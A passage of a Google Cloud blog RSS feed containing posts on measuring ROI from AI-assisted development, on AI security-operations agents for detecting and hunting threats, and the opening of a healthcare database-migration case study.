&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The learning curve:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams require dedicated time away from regular feature delivery to adapt their daily workflows and master advanced techniques, evolving from simple prompting to building systems based on context and intent.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The verification tax:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because AI dramatically increases the sheer volume of code produced, developers must invest extra time rigorously reviewing generated outputs to ensure trustworthiness, prevent hallucinations, and meet internal architectural standards.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Pipeline adaptation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As individual developers generate code significantly faster, downstream processes like testing and change approvals often become bottlenecks and must be actively scaled to handle the increased throughput.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Budgeting for this initial learning phase is key to making the transition work. By anticipating this temporary drop in productivity, you can confidently keep your AI projects moving forward, knowing that these early challenges are an investment in your team's long-term speed.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_M6uB5gM.max-1000x1000.jpg"
        
          alt="1"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="02esl"&gt;The J-Curve of AI value realization&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #2: Understand the market divide on AI returns&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://dora.dev/dora-report-2025/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;DORA’s state of AI-assisted software development report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows that 90% of DORA survey respondents report using AI at work. Despite nearly universal adoption, actual financial impacts vary across organizations. Across the market, some companies see clear value from their engineering investments, while others struggle with unexpected costs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When a project falls short, it’s often because the team lacks the organizational support to make it work. To get the returns you expect, you need to prepare your workflows and teams to adopt the new technology. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #3: Calculating your AI ROI is essential&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building a realistic financial model for AI starts with looking at where it actually adds value. Across the software development lifecycle, AI can help your team reduce costs, boost productivity, improve security, and deliver a better experience for both developers and users.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist in modeling this for your organization, you can use this &lt;/span&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;interactive ROI calculator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;This tool helps you explicitly forecast both the visible expenses and the hidden realities of AI adoption.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;You can explore the mechanics, adjust the assumptions to match your reality, and build your own estimate.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_Iv3XZeI.max-1000x1000.jpg"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="02esl"&gt;The value model—from adoption to ROI&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/resources/content/dora-roi-of-ai-assisted-software-development"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Download the full report&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Explore the complete framework to quantify your AI investments, navigate the J-Curve, and map your AI investment roadmap.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Try out the interactive ROI calculator&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Visit &lt;/span&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://dora.dev/ai/roi/calculator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to estimate your organization's potential returns and build a defensible business case.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Watch this Cloud OnAir webinar: &lt;/span&gt;&lt;a href="https://cloudonair.withgoogle.com/events/from-cost-center-to-value-engine" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;From cost center to value engine: Building your business case for AI-assisted development&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</guid><category>AI &amp; Machine Learning</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/DORA-Report_Cover-Formats_9-16.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>How to unlock true ROI in software development – a deep dive into the latest DORA research</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/DORA-Report_Cover-Formats_9-16.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Dr. Ursula Löbbert-Passing</name><title>Ph.D., AI Value Realization Lead, delta EMEA</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Eva Dong</name><title>AI Value Realization, Delta Americas</title><department></department><company></company></author></item><item><title>Detecting and containing AI-powered threats with Google Security Operations agents</title><link>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="eucpw"&gt;To defend against the growing range of AI-accelerated threat actors, organizations need to be able to respond faster to outpace the adversary.&lt;/p&gt;&lt;p data-block-key="8q6td"&gt;Recently, &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense"&gt;we announced Google AI Threat Defense&lt;/a&gt;, an automated security system designed to help you continuously monitor for and stop AI-powered threats before they can impact your business. Based on Google’s own approach to today’s threats and vulnerability management, it’s centered on a four-step framework: Prepare, scan and prioritize, remediate, and monitor.&lt;/p&gt;&lt;p data-block-key="1uk59"&gt;Today, we’re sharing more details on how &lt;a href="https://cloud.google.com/security/products/security-operations"&gt;Google Security Operations&lt;/a&gt; works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or can not patch. The remediation gap represents a critical vulnerability.&lt;/p&gt;&lt;p data-block-key="55ndt"&gt;According to &lt;a href="https://services.google.com/fh/files/misc/m-trends-2026-executive-edition-en.pdf" target="_blank"&gt;M-Trends 2026&lt;/a&gt;, the exploitation of vulnerabilities has become the most common initial infection vector. Notably, the report also indicates that the mean time to exploit has dropped to an estimated minus seven days, meaning exploitation frequently occurs even before a patch is officially released. Google Security Operations delivers vital operational fabric to autonomously contain active attacks across your entire environment.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/AI_Threat_Wheel_-_4_Monitor.max-1000x1000.png"
        
          alt="AI Threat Wheel - 4 Monitor"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="t8ado"&gt;Google Security Operations supports AI Threat Defense to monitor, detect, and respond to threats.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="psooj"&gt;Engineered around a comprehensive approach that uses compensating controls with proactive security to strengthen operational resilience, Google Security Operations is built on a strategic, three-part approach to cross-environment visibility across your entire attack surface:&lt;/p&gt;&lt;ul&gt;&lt;li data-block-key="94t25"&gt;Continuous and autonomous coverage analysis and detection generation&lt;/li&gt;&lt;li data-block-key="103dl"&gt;Autonomous investigation, containment, and response&lt;/li&gt;&lt;li data-block-key="90gg6"&gt;Retroactive hunting&lt;/li&gt;&lt;/ul&gt;&lt;p data-block-key="5n4gt"&gt;Designed to help you see and respond to threats faster than ever before, we deliver these capabilities at machine-scale and machine-speed. Together with &lt;a href="https://cloud.google.com/security/ai-threat-defense"&gt;Google AI Threat Defense&lt;/a&gt;, we’re able to provide the autonomous platform you need to outpace AI-driven attacks.&lt;/p&gt;&lt;h3 data-block-key="84lj0"&gt;&lt;b&gt;1. Continuous and autonomous coverage analysis and detection generation&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="e8bek"&gt;While proactive defense can identify vulnerabilities before they can be exploited, there will be applications that you can not patch, as well as potential gaps in the time it takes to remediate vulnerabilities.&lt;/p&gt;&lt;p data-block-key="52cg1"&gt;The &lt;a href="https://www.verizon.com/business/resources/T3ef/reports/2026-dbir-data-breach-investigations-report.pdf" target="_blank"&gt;2026 Verizon Data Breach Investigations Report&lt;/a&gt; underscores the magnitude of this challenge. In a study encompassing over 13,000 organizations, only 26% of vulnerabilities identified on the CISA Known Exploited Vulnerabilities (KEV) list had been fully remediated. Moreover, the median duration required to achieve full patching after detection stands at 43 days. Clearly, you still need continuous monitoring to detect threats in your environments.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=h9rejA7OAxI"
      data-glue-modal-trigger="uni-modal-h9rejA7OAxI-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/SecOps-AITD_YouTube_Thumbnail.max-1000x1000.png);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/h4&gt;
        
        
          &lt;p&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/p&gt;
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-h9rejA7OAxI-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="h9rejA7OAxI"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=h9rejA7OAxI"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="prjrl"&gt;The &lt;b&gt;Detection Engineering agent&lt;/b&gt; in Google Security Operations can automatically translate new exploitation patterns of unpatched vulnerabilities into custom detections for your specific environment. Available in preview, it analyzes a diverse array of input sources to quickly and effectively recognize malicious activity, so you can uncover novel attack patterns evolving from new and unpatched vulnerabilities.&lt;/p&gt;&lt;p data-block-key="6o4e6"&gt;The agent’s sources include Google Threat Intelligence (such as emerging threat intelligence, new attack patterns curated by Mandiant, offensive tool repositories, red and purple team reports, autonomous malware analysis, open-source detection repositories and blogs), and internal security telemetry.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_AgenticDetection_workflow.max-1000x1000.png"
        
          alt="Blog_AgenticDetection workflow"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="4bxt7"&gt;The workflow of the Detection Engineering agent.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="4bd61"&gt;To automatically find and fill coverage gaps tailored to your environment, the agent proactively builds new rules and validates them with synthetic events to help ensure your environment is covered before an exploit hits.&lt;/p&gt;&lt;h3 data-block-key="djss9"&gt;&lt;b&gt;2. Autonomous investigation, containment, and response&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="6dpjh"&gt;If a threat is detected, you need to immediately and autonomously assess and respond to protect your environment. By bringing together visibility from cloud and enterprise assets, including endpoints, on-premises firewall, identity, network, and custom application logs, your security operations center (SOC) can gain the full context of an attack, and unify disparate signals into a complete, actionable narrative the moment an adversary strikes.&lt;/p&gt;&lt;p data-block-key="3ji8q"&gt;The &lt;b&gt;Triage and Investigation agent&lt;/b&gt; in Google Security Operations, generally available, helps analysts drastically reduce time to respond by autonomously investigating alerts, gathering evidence for analysis, and providing verdicts with comprehensive explanations. It can help security analysts automate decision-making, alert closure, and remediation flows, allowing them to spend more time prioritizing high-priority threats instead of false positives.&lt;/p&gt;&lt;p data-block-key="3mn0q"&gt;The agent has already investigated over 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.&lt;/p&gt;&lt;p data-block-key="360r1"&gt;While identifying threats is critical, the ultimate goal is rapid remediation. &lt;a href="https://cloud.google.com/blog/products/identity-security/rsac-26-supercharging-agentic-ai-defense-with-frontline-threat-intelligence"&gt;&lt;b&gt;Agentic automation&lt;/b&gt;&lt;/a&gt;, available in preview, can help contain attacks by combining dynamic AI agents — which autonomously gather evidence and reason through complex alerts — with deterministic enterprise playbooks.&lt;/p&gt;&lt;p data-block-key="cvfhl"&gt;This hybrid approach ensures that analysts remain in absolute control of critical, high-impact actions while using AI to safely automate decision-making and remediation workflows.&lt;/p&gt;&lt;h3 data-block-key="b11bq"&gt;&lt;b&gt;3. Retroactive hunting&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="9iovv"&gt;Even with autonomous detections and rapid-response handling of active threats, stealthy adversaries and zero-day exploits can sometimes bypass frontline controls. To achieve operational resilience, security teams must also look backward through their data to uncover hidden compromises.&lt;/p&gt;&lt;p data-block-key="355i4"&gt;Strong, effective defensive strategies rely on more than just reacting to alerts. The &lt;b&gt;Threat Hunting agent&lt;/b&gt;, available in preview, can help teams proactively hunt for novel attack patterns and stealthy adversary behaviors that bypass traditional defenses.&lt;/p&gt;&lt;p data-block-key="eamnc"&gt;By scouring petabytes of enterprise telemetry (including historical logs) for subtle anomalies the agent fundamentally shifts the SOC posture from reactive to deeply proactive.&lt;/p&gt;&lt;h3 data-block-key="5ke81"&gt;&lt;b&gt;Auditing the Axios supply chain attack&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="cka6e"&gt;When adversaries can generate unique exploits and command-and-control (C2) infrastructure at zero marginal cost, static indicators like hashes and IPs decay instantly. Defenders must instead detect the behavioral tactics, techniques, and procedures (TTPs) of the attack.&lt;/p&gt;&lt;p data-block-key="17iv1"&gt;We had the Detection Engineering agent audit our coverage against the recent &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package"&gt;Axios supply chain attack&lt;/a&gt; (UNC1069). The agent mapped the campaign intelligence into behavioral threat detection opportunities (TDOs), simulated the attack chain using high-fidelity synthetic UDM logs, and ran them against active rules.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Google_Detection_Engineering_agent_output.max-1000x1000.png"
        
          alt="Google Detection Engineering agent output"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="56ozc"&gt;Google Detection Engineering agent output.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="29tyz"&gt;We successfully flagged the execution phases in the middle (renamed PowerShell and macOS background shells), but were blind at the initial entry point (NPM postinstall dropper) and the final C2 exit point.&lt;/p&gt;&lt;p data-block-key="dfv8i"&gt;By exposing these blind spots, the agent helped us proactively engineer custom YARA-L rules to close the loop at the first and final steps of the kill chain. You can sign up for the Google Security Operations &lt;a href="https://docs.google.com/forms/d/14pJvNEZvCtk8NkTiA0QFKCQ0_QfQ-3FJn6ndPBsi_K4/edit?chromeless=1" target="_blank"&gt;Detection Engineering agent preview today&lt;/a&gt;.&lt;/p&gt;&lt;h3 data-block-key="a9it"&gt;&lt;b&gt;Next steps&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="64qqr"&gt;By integrating Google Security Operations Gemini-native specialized agents into your workflow, you can autonomously generate detections, orchestrate containment, and hunt for stealthy threats at machine speed. This allows you to maintain a resilient defense even when primary controls fail, ultimately driving a 70% reduction in both breach risks and costs.&lt;/p&gt;&lt;p data-block-key="dt4he"&gt;Google AI Threat Defense working alongside Google Security Operations can help you consistently outpace automated adversaries. To learn more about how Google AI Threat Defense and Google Security Operations can help you fight AI with AI, check out our &lt;a href="https://cloudonair.withgoogle.com/events/google-cloud-security-talks-june-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-GLOBAL-STO55-onlineevent-er-dgcsm-JuneSecTl-172732&amp;amp;utm_content=blog&amp;amp;utm_term=-" target="_blank"&gt;Security Talks online event on June 10&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</guid><category>AI &amp; Machine Learning</category><category>Security &amp; Identity</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Detecting_and_containing_AI-powered_threats_.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Detecting and containing AI-powered threats with Google Security Operations agents</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Detecting_and_containing_AI-powered_threats_.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Jon Ramsey</name><title>VP &amp; GM, Google Cloud Security</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Payal Chakravarty</name><title>Director of Product Management, Google Cloud</title><department></department><company></company></author></item><item><title>Modernizing Healthcare: How Alcidion achieved greater stability and performance with AlloyDB</title><link>https://cloud.google.com/blog/products/databases/modernizing-healthcare-how-alcidion-achieved-greater-stability-and-performance/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In clinical informatics, every second counts. For &lt;/span&gt;&lt;a href="https://www.alcidion.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Alcidion&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a global leader in smart health solutions, the mission is simple but critical: use technology to reduce cognitive load for clinicians and present the right information at the right time to save lives.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether it’s managing patient flow in an emergency department or ensuring a patient is in the correct ward to avoid adverse outcomes, Alcidion’s flagship platform, &lt;/span&gt;&lt;a href="https://www.alcidion.com/platform/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Miya Precision&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, serves as a dynamic intelligent care platform for modern hospitals. To power this mission, the platform recently underwent a major architectural transformation, migrating from a legacy Microsoft SQL Server environment to Google Cloud’s &lt;/span&gt;&lt;a href="https://cloud.google.com/products/alloydb"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge: overcoming performance bottlenecks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operating in an industry where data integrity and uptime are non-negotiable, Alcidion faced several technical and operational hurdles with its previous setup:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational overhead:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Managing persistent backends for SQL Server required significant manual effort. The team had to manually balance database loads between elastic pools to maintain performance while trying to optimize costs. They also had to constantly manage the gap between allocated and used space to prevent shared pools from being consumed by excessive slack space.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Performance latency:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Complex JSON data processing, critical for modern health informatics, was taking up to 30 minutes for certain jobs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Stability concerns:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The team sought a more stable Kubernetes environment and a persistent backend that could scale without constant administrative intervention.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution: a smooth migration to AlloyDB&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alcidion used the &lt;/span&gt;&lt;a href="https://cloud.google.com/database-migration"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Database Migration Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (DMS) to move from SQL Server to AlloyDB, achieving a remarkably efficient cutover. The total learning and migration process took under one month, with the core database move completed in only one and a half weeks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By creating custom synchronization tools and using Google Cloud’s managed services, the team reduced the final transition window to just 15 minutes. Alcidion achieved this by spinning up a new Google Cloud instance synchronized to the active one, with both accessible via unique fully qualified domain names. The new environment remained in read-only mode for customer validation. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During the final cutover, the old instance was set to read-only, synchronization was halted, and external integration links were toggled to the new environment. This streamlined process allowed users to log into the new instance and resume work within minutes, with the primary delay being DNS record updates.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alcidion chose a fully managed AlloyDB service to eliminate control plane tasks and administrative overhead. This shift allows their engineering team to focus on clinical innovation and product development rather than "managing the container" or the underlying database infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Being able to cut over to AlloyDB in about 15 minutes had our users back to work almost immediately. For a system clinicians rely on around the clock, that kind of smooth transition gave Alcidion real confidence.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;The results: impact by the numbers&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The shift to AlloyDB and Google’s &lt;/span&gt;&lt;a href="https://cloud.google.com/data-cloud"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; has delivered immediate, quantifiable improvements for Alcidion and its healthcare customers:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Faster data processing:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Data processing that previously relied on SQL Server stored procedures — a process that became increasingly time-consuming as data volumes grew — has been transformed. By migrating to AlloyDB and using &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and Dataflow for processing, Alcidion has seen jobs that once took 30 minutes now complete in just 5 to 60 seconds.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced stability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The migration has delivered a step-change in reliability. In the previous environment, the team faced monthly disruptions, ranging from failed scheduled maintenance to connectivity issues that required manual intervention. In contrast, AlloyDB and Google Cloud’s compute services have proven exceptionally stable, allowing the team to move away from the "firefighting" mode associated with frequent infrastructure crashes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Reduced cognitive load:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By simplifying their backend and clinical dashboards, Alcidion’s SREs have significantly reduced their administrative burden. This shift has freed the team to focus on high-value innovation, such as refining predictive analytics and generative AI that empower clinicians to make informed clinical decisions faster.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
